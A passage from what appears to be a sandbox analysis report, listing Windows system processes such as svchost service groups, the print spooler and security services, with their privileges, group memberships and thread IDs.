[0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BrokerInfrastructure" [0xa], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\DeviceInstall" [0xa], "NT SERVICE\\LSM" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT SERVICE\\SystemEventsBroker" [0xa], "NT AUTHORITY\\Logon Session 00000000:00004ed0" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 349 os_tid = 0xb0c Thread: id = 350 os_tid = 0xa9c Thread: id = 351 os_tid = 0x9b4 Thread: id = 352 os_tid = 0x9a4 Thread: id = 353 os_tid = 0x99c Thread: id = 354 os_tid = 0x964 Thread: id = 355 os_tid = 0x960 Thread: id = 356 os_tid = 0x954 Thread: id = 357 os_tid = 0x948 Thread: id = 358 os_tid = 0x92c Thread: id = 359 os_tid = 0x918 Thread: id = 360 os_tid = 0x90c Thread: id = 361 os_tid = 0x75c Thread: id = 362 os_tid = 0x758 Thread: id = 363 os_tid = 0x638 Thread: id = 364 os_tid = 0x62c Thread: id = 365 os_tid = 0x40c Thread: id = 366 os_tid = 0x314 Thread: id = 367 os_tid = 0x2ec Thread: id = 368 os_tid = 0x3b4 Thread: id = 369 os_tid = 0x358 Thread: id = 370 os_tid = 0x354 Thread: id = 371 os_tid = 0x340 Thread: id = 372 os_tid = 0x32c Thread: id = 373 os_tid = 0x31c Thread: id = 374 os_tid = 0x30c Thread: id = 375 os_tid = 0x2f4 Thread: id = 376 os_tid = 0x2a8 Thread: id = 655 os_tid = 0x1050 Thread: id = 659 os_tid = 0x11d4 Process: id = "23" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x74d18000" os_pid = "0x304" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:00008d78" [0xc000000f], "LOCAL" [0x7] Thread: id = 377 os_tid = 0x9ac Thread: id = 378 os_tid = 0x9a8 Thread: id = 379 os_tid = 0x950 Thread: id = 380 os_tid = 0x94c Thread: id = 381 os_tid = 0x93c Thread: id = 382 os_tid = 0x938 Thread: id = 383 os_tid = 0x934 Thread: id = 384 os_tid = 0x928 Thread: id = 385 os_tid = 0x924 Thread: id = 386 os_tid = 0x91c Thread: id = 387 os_tid = 0x640 Thread: id = 388 os_tid = 0x63c Thread: id = 389 os_tid = 0x630 Thread: id = 390 os_tid = 0x628 Thread: id = 391 os_tid = 0x3c8 Thread: id = 392 os_tid = 0x344 Thread: id = 393 os_tid = 0x338 Thread: id = 394 os_tid = 0x334 Thread: id = 395 os_tid = 0x324 Thread: id = 396 os_tid = 0x320 Thread: id = 397 os_tid = 0x318 Thread: id = 398 os_tid = 0x308 Process: id = "24" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x74331000" os_pid = "0x3c0" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xa], "NT SERVICE\\CoreMessagingRegistrar" [0xe], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\NcdAutoSetup" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f63" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Thread: id = 399 os_tid = 0xa60 Thread: id = 400 os_tid = 0xa5c Thread: id = 401 os_tid = 0xa58 Thread: id = 402 os_tid = 0xa34 Thread: id = 403 os_tid = 0xa1c Thread: id = 404 os_tid = 0xa18 Thread: id = 405 os_tid = 0x9f8 Thread: id = 406 os_tid = 0x8ec Thread: id = 407 os_tid = 0x8e8 Thread: id = 408 os_tid = 0x87c Thread: id = 409 os_tid = 0x870 Thread: id = 410 os_tid = 0x838 Thread: id = 411 os_tid = 0x834 Thread: id = 412 os_tid = 0x814 Thread: id = 413 os_tid = 0x7a8 Thread: id = 414 os_tid = 0x78c Thread: id = 415 os_tid = 0x7e0 Thread: id = 416 os_tid = 0x7f4 Thread: id = 417 os_tid = 0x694 Thread: id = 418 os_tid = 0x7d4 Thread: id = 419 os_tid = 0x7cc Thread: id = 420 os_tid = 0x7c8 Thread: id = 421 os_tid = 0x7c4 Thread: id = 422 os_tid = 0x65c Thread: id = 423 os_tid = 0x15c Thread: id = 424 os_tid = 0x3c4 Process: id = "25" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x738d0000" os_pid = "0x3d8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\RmSvc" [0xa], "NT SERVICE\\TimeBrokerSvc" [0xa], "NT SERVICE\\TimeBroker" [0xa], "NT SERVICE\\vmictimesync" [0xa], "S-1-5-80-1495648203-2503502111-1597754693-3445174711-1316708627" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a38e" [0xc000000f], "LOCAL" [0x7] Thread: id = 425 os_tid = 0xf40 Thread: id = 426 os_tid = 0xb9c Thread: id = 427 os_tid = 0x1190 Thread: id = 428 os_tid = 0x116c Thread: id = 429 os_tid = 0x107c Thread: id = 430 os_tid = 0x1068 Thread: id = 431 os_tid = 0x1390 Thread: id = 432 os_tid = 0xf34 Thread: id = 433 os_tid = 0xf30 Thread: id = 434 os_tid = 0x54c Thread: id = 435 os_tid = 0x444 Thread: id = 436 os_tid = 0x418 Thread: id = 437 os_tid = 0x410 Thread: id = 438 os_tid = 0x35c Thread: id = 439 os_tid = 0x3f4 Thread: id = 440 os_tid = 0x3f0 Thread: id = 441 os_tid = 0x33c Thread: id = 442 os_tid = 0x238 Thread: id = 443 os_tid = 0x154 Thread: id = 444 os_tid = 0x3dc Process: id = "26" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x735ee000" os_pid = "0x3f8" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xa], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\DeviceAssociationService" [0xa], "NT SERVICE\\DevQueryBroker" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\DsSvc" [0xa], "NT SERVICE\\fhsvc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\HvHost" [0xa], "S-1-5-80-2355113075-3359631449-3346493237-3667020425-1655874352" [0xa], "NT SERVICE\\irmon" [0xa], "NT SERVICE\\NcbService" [0xe], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\NgcSvc" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\ScDeviceEnum" [0xa], "NT SERVICE\\SensorService" [0xa], "NT SERVICE\\SmsRouter" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\svsvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\vmicguestinterface" [0xa], "NT SERVICE\\vmickvpexchange" [0xa], "NT SERVICE\\vmicshutdown" [0xa], "NT SERVICE\\vmicvmsession" [0xa], "NT SERVICE\\vmicvss" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\WiaRpc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a4e4" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 445 os_tid = 0xa38 Thread: id = 446 os_tid = 0xe38 Thread: id = 447 os_tid = 0xe60 Thread: id = 448 os_tid = 0xe5c Thread: id = 449 os_tid = 0x898 Thread: id = 450 os_tid = 0x894 Thread: id = 451 os_tid = 0x890 Thread: id = 452 os_tid = 0x88c Thread: id = 453 os_tid = 0x878 Thread: id = 454 os_tid = 0x5ac Thread: id = 455 os_tid = 0x548 Thread: id = 456 os_tid = 0x540 Thread: id = 457 os_tid = 0x4e0 Thread: id = 458 os_tid = 0x4bc Thread: id = 459 os_tid = 0x290 Thread: id = 460 os_tid = 0x164 Thread: id = 461 os_tid = 0x3fc Thread: id = 697 os_tid = 0xd44 Thread: id = 699 os_tid = 0x1380 Process: id = "27" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x566ab000" os_pid = "0x350" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\bthserv" [0xa], "NT SERVICE\\CDPSvc" [0xa], "NT SERVICE\\EventSystem" [0xa], "NT SERVICE\\FontCache" [0xa], "NT SERVICE\\LicenseManager" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xe], "NT SERVICE\\PhoneSvc" [0xa], "NT SERVICE\\RemoteRegistry" [0xa], "S-1-5-80-2226967063-754826275-1661302337-2802353169-2369347280" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\tzautoupdate" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "S-1-5-80-3916113136-2435487254-2535488001-4050622930-2364918814" [0xa], "NT SERVICE\\workfolderssvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b10d" [0xc000000f], "LOCAL" [0x7] Thread: id = 462 os_tid = 0x8 Thread: id = 463 os_tid = 0x1298 Thread: id = 464 os_tid = 0x680 Thread: id = 465 os_tid = 0xf38 Thread: id = 466 os_tid = 0xcbc Thread: id = 467 os_tid = 0xc24 Thread: id = 468 os_tid = 0xc10 Thread: id = 469 os_tid = 0xc0c Thread: id = 470 os_tid = 0xc08 Thread: id = 471 os_tid = 0xc04 Thread: id = 472 os_tid = 0xbd0 Thread: id = 473 os_tid = 0x9dc Thread: id = 474 os_tid = 0x544 Thread: id = 475 os_tid = 0x6f4 Thread: id = 476 os_tid = 0xbcc Thread: id = 477 os_tid = 0x4dc Thread: id = 478 os_tid = 0x490 Thread: id = 479 os_tid = 0x4c4 Thread: id = 480 os_tid = 0x9d4 Thread: id = 481 os_tid = 0x8f4 Thread: id = 482 os_tid = 0x700 Thread: id = 483 os_tid = 0x538 Thread: id = 484 os_tid = 0x534 Thread: id = 485 os_tid = 0x530 Thread: id = 486 os_tid = 0x500 Thread: id = 487 os_tid = 0x4b8 Thread: id = 488 os_tid = 0x498 Thread: id = 489 os_tid = 0x47c Thread: id = 490 os_tid = 0x478 Thread: id = 491 os_tid = 0x474 Thread: id = 492 os_tid = 0x470 Thread: id = 493 os_tid = 0x46c Thread: id = 494 os_tid = 0x468 Thread: id = 495 os_tid = 0x448 Thread: id = 496 os_tid = 0x424 Thread: id = 497 os_tid = 0x420 Thread: id = 498 os_tid = 0x364 Thread: id = 663 os_tid = 0x1140 Thread: id = 722 os_tid = 0x12b0 Thread: id = 723 os_tid = 0xed4 Thread: id = 724 os_tid = 0xf1c Process: id = "28" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x667bb000" os_pid = "0x434" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\System32\\svchost.exe -k NetworkService" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xa], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\NlaSvc" [0xe], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bd29" [0xc000000f], "LOCAL" [0x7] Thread: id = 499 os_tid = 0x58c Thread: id = 500 os_tid = 0x117c Thread: id = 501 os_tid = 0x1178 Thread: id = 502 os_tid = 0x1114 Thread: id = 503 os_tid = 0xfcc Thread: id = 504 os_tid = 0xfc8 Thread: id = 505 os_tid = 0xf18 Thread: id = 506 os_tid = 0xf10 Thread: id = 507 os_tid = 0xefc Thread: id = 508 os_tid = 0xedc Thread: id = 509 os_tid = 0x6b8 Thread: id = 510 os_tid = 0x864 Thread: id = 511 os_tid = 0x674 Thread: id = 512 os_tid = 0x658 Thread: id = 513 os_tid = 0x4d4 Thread: id = 514 os_tid = 0x4d0 Thread: id = 515 os_tid = 0x4cc Thread: id = 516 os_tid = 0x4c8 Thread: id = 517 os_tid = 0x4c0 Thread: id = 518 os_tid = 0x494 Thread: id = 519 os_tid = 0x48c Thread: id = 520 os_tid = 0x488 Thread: id = 521 os_tid = 0x464 Thread: id = 522 os_tid = 0x45c Thread: id = 523 os_tid = 0x458 Thread: id = 524 os_tid = 0x454 Thread: id = 525 os_tid = 0x450 Thread: id = 526 os_tid = 0x438 Process: id = "29" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x57af0000" os_pid = "0x554" os_integrity_level = "0x4000" os_privileges = "0x20800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000ec56" [0xc000000f], "LOCAL" [0x7] Thread: id = 527 os_tid = 0x113c Thread: id = 528 os_tid = 0x588 Thread: id = 529 os_tid = 0x584 Thread: id = 530 os_tid = 0x580 Thread: id = 531 os_tid = 0x57c Thread: id = 532 os_tid = 0x578 Thread: id = 533 os_tid = 0x574 Thread: id = 534 os_tid = 0x570 Thread: id = 535 os_tid = 0x558 Process: id = "30" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4f8fa000" os_pid = "0x590" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "S-1-5-80-4071458001-3563271761-1846288968-3700919931-3809667977" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000f41a" [0xc000000f], "LOCAL" [0x7] Thread: id = 536 os_tid = 0xcc0 Thread: id = 537 os_tid = 0xc30 Thread: id = 538 os_tid = 0x8e4 Thread: id = 539 os_tid = 0x8e0 Thread: id = 540 os_tid = 0x594 Process: id = "31" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4c27b000" os_pid = "0x598" os_integrity_level = "0x4000" os_privileges = "0x20800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Wcmsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000f421" [0xc000000f], "LOCAL" [0x7] Thread: id = 541 os_tid = 0x68c Thread: id = 542 os_tid = 0x66c Thread: id = 543 os_tid = 0x624 Thread: id = 544 os_tid = 0x614 Thread: id = 545 os_tid = 0x60c Thread: id = 546 os_tid = 0x608 Thread: id = 547 os_tid = 0x604 Thread: id = 548 os_tid = 0x600 Thread: id = 549 os_tid = 0x5d4 Thread: id = 550 os_tid = 0x59c Process: id = "32" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4c27d000" os_pid = "0x5b0" os_integrity_level = "0x4000" os_privileges = "0x260814080" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k appmodel" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xe], "NT SERVICE\\tiledatamodelsvc" [0xa], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000f8bc" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 551 os_tid = 0xea8 Thread: id = 552 os_tid = 0x13e4 Thread: id = 553 os_tid = 0x13f0 Thread: id = 554 os_tid = 0x12f4 Thread: id = 555 os_tid = 0x9bc Thread: id = 556 os_tid = 0x7ec Thread: id = 557 os_tid = 0x770 Thread: id = 558 os_tid = 0x7d8 Thread: id = 559 os_tid = 0x698 Thread: id = 560 os_tid = 0x690 Thread: id = 561 os_tid = 0x5fc Thread: id = 562 os_tid = 0x5f8 Thread: id = 563 os_tid = 0x5f4 Thread: id = 564 os_tid = 0x5b4 Process: id = "33" image_name = "spoolsv.exe" filename = "c:\\windows\\system32\\spoolsv.exe" page_root = "0x4ac0c000" os_pid = "0x5e8" os_integrity_level = "0x4000" os_privileges = "0x20a00080" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\System32\\spoolsv.exe" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Spooler" [0xe], "NT AUTHORITY\\Logon Session 00000000:0001010e" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 565 os_tid = 0x514 Thread: id = 566 os_tid = 0x12e4 Thread: id = 567 os_tid = 0x12e0 Thread: id = 568 os_tid = 0x12dc Thread: id = 569 os_tid = 0x12cc Thread: id = 570 os_tid = 0x12c4 Thread: id = 571 os_tid = 0x12c0 Thread: id = 572 os_tid = 0x12ac Thread: id = 573 os_tid = 0x12a8 Thread: id = 574 os_tid = 0x634 Thread: id = 575 os_tid = 0x620 Thread: id = 576 os_tid = 0x618 Thread: id = 577 os_tid = 0x610 Thread: id = 578 os_tid = 0x5ec Process: id = "34" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4f046000" os_pid = "0x69c" os_integrity_level = "0x4000" os_privileges = "0x860814080" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k wsappx" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppXSvc" [0xe], "NT SERVICE\\ClipSVC" [0xa], "NT AUTHORITY\\Logon Session 00000000:0001205b" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 579 os_tid = 0x1188 Thread: id = 580 os_tid = 0x12b8 Thread: id = 581 os_tid = 0x7d0 Thread: id = 582 os_tid = 0x6b4 Thread: id = 583 os_tid = 0x6b0 Thread: id = 584 os_tid = 0x6a8 Thread: id = 585 os_tid = 0x6a0 Thread: id = 661 os_tid = 0x11d0 Thread: id = 662 os_tid = 0x114c Thread: id = 676 os_tid = 0x1fc Process: id = "35" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4dab9000" os_pid = "0x720" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 586 os_tid = 0x12b4 Thread: id = 587 os_tid = 0x9c0 Thread: id = 588 os_tid = 0xd28 Thread: id = 589 os_tid = 0x13b4 Thread: id = 590 os_tid = 0xcc4 Thread: id = 591 os_tid = 0x6d4 Thread: id = 592 os_tid = 0x74c Thread: id = 593 os_tid = 0x7dc Thread: id = 594 os_tid = 0x7b4 Thread: id = 595 os_tid = 0x76c Thread: id = 596 os_tid = 0x768 Thread: id = 597 os_tid = 0x754 Thread: id = 598 os_tid = 0x750 Thread: id = 599 os_tid = 0x748 Thread: id = 600 os_tid = 0x724 Process: id = "36" image_name = "officeclicktorun.exe" filename = "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe" page_root = "0x465e2000" os_pid = "0x818" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x23c" cmd_line = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe\" /service" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 601 os_tid = 0xcf8 Thread: id = 602 os_tid = 0x10a4 Thread: id = 603 os_tid = 0xf08 Thread: id = 604 os_tid = 0xe80 Thread: id = 605 os_tid = 0xe68 Thread: id = 606 os_tid = 0xb6c Thread: id = 607 os_tid = 0xa68 Thread: id = 608 os_tid = 0xa48 Thread: id = 609 os_tid = 0xa3c Thread: id = 610 os_tid = 0xa04 Thread: id = 611 os_tid = 0xa00 Thread: id = 612 os_tid = 0x9f4 Thread: id = 613 os_tid = 0x9f0 Thread: id = 614 os_tid = 0x9ec Thread: id = 615 os_tid = 0x9e4 Thread: id = 616 os_tid = 0x9c8 Thread: id = 617 os_tid = 0x858 Thread: id = 618 os_tid = 0x828 Thread: id = 619 os_tid = 0x81c Process: id = "37" image_name = "securityhealthservice.exe" filename = "c:\\windows\\system32\\securityhealthservice.exe" page_root = "0x4aae8000" os_pid = "0x84c" os_integrity_level = "0x4000" os_privileges = "0x20900080" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\SecurityHealthService.exe" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "S-1-5-80-259296475-4084429506-1152984619-38739575-565535606" [0xe], "NT AUTHORITY\\Logon Session 00000000:000180f8" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 620 os_tid = 0x994 Thread: id = 621 os_tid = 0x990 Thread: id = 622 os_tid = 0x98c Thread: id = 623 os_tid = 0x8d4 Thread: id = 624 os_tid = 0x850 Process: id = "38" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x6602e000" os_pid = "0x10cc" os_integrity_level = "0x4000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k LocalServiceAndNoImpersonation" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BthHFSrv" [0xa], "NT SERVICE\\FDResPub" [0xa], "NT SERVICE\\QWAVE" [0xa], "NT SERVICE\\SCardSvr" [0xa], "NT SERVICE\\SensrSvc" [0xa], "NT SERVICE\\SSDPSRV" [0xe], "NT SERVICE\\upnphost" [0xa], "NT SERVICE\\wcncsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00054dca" [0xc000000f], "LOCAL" [0x7] Thread: id = 625 os_tid = 0x111c Thread: id = 626 os_tid = 0x1118 Thread: id = 627 os_tid = 0x1110 Thread: id = 628 os_tid = 0x1108 Thread: id = 629 os_tid = 0x1104 Thread: id = 630 os_tid = 0x1100 Thread: id = 631 os_tid = 0x10fc Thread: id = 632 os_tid = 0x10d0 Process: id = "39" image_name = "sppsvc.exe" filename = "c:\\windows\\system32\\sppsvc.exe" page_root = "0x14658000" os_pid = "0x4b4" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x23c" cmd_line = 